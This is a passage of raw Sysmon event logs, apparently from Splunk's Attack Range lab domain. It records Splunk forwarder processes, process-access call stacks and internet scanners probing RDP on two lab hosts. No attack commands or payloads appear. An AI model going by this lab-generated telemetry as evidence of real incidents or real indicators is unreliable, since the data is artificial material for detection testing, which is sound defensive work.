Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051139Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.147{85C0FFC9-ECA8-607E-0007-00000000BB01}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:57.463{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8FFA4E319EB92D06A5F96A6265B06C4,SHA256=480D8E651A8C6DB1F86FCBC617CAB4AE6DAE10D5B2C8755539BDDE36B88BC559,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:56.103{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40623-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:56.062{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43329-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:57.385{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5103E04301E5D627322D111D6E46C2F,SHA256=11C58052FDCD42DEA8B9C1D6491636D023E17D3701884B0B24A0E1D31590D2AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051186Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.896{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D44E25584838D54548B155FB4E519FA7,SHA256=F2DCDF3D81A483C0FD81EE7AA110061914A451F8E0674C727607ADB0693A5027,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051185Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.787{85C0FFC9-ECA9-607E-0207-00000000BB01}26883148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000051184Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5351F0D035A019840494B95F25456E0C,SHA256=ADEA3065130AFE6FEBD4A64441121263BF6480A4E32DD41A4B0AD71179B8DC11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000051183Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECA9-607E-0207-00000000BB01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051182Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051181Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051180Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051179Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051178Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051177Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051176Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051175Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051174Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051173Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-ECA9-607E-0207-00000000BB01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000051172Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-ECA9-607E-0207-00000000BB01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000051171Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.662{85C0FFC9-ECA9-607E-0207-00000000BB01}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000051170Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:55.009{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53645-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051169Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:54.693{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55612-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000051168Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:57.099{85C0FFC9-ECA8-607E-0107-00000000BB01}2876636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:58.791{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55282CF676B4E9CAFB83733CC75460D7,SHA256=3C6D9B43323C8E4A3688EDD1332FFA7D3949FF9CD244BE4B1260FF60CEDF6649,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:57.183{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57676-false10.0.1.12-8000- 354300x800000000000000082451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:56.424{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55687-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:58.416{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9192671E5423D53E2528F30E9BDDE0E,SHA256=F087C96A5570C893F009890F21973BC4188381EC44E68067E70ABE8BA21A666B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051203Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.646{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01AD1604576B3B2D8AB0B1FA4EB4BC9,SHA256=DE62EC2ABA2219D24E69F70EA7D14B1BA36D3AEE646B4CF3E211EAD35EDDB36C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051202Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:56.087{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57070-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000051201Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.443{85C0FFC9-ECAA-607E-0307-00000000BB01}13283224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051200Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.443{85C0FFC9-B7EC-607E-0B00-00000000BB01}6322600C:\Windows\system32\lsass.exe{85C0FFC9-B7EA-607E-0100-00000000BB01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000051199Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-ECAA-607E-0307-00000000BB01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051198Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000051197Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:58.334{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+8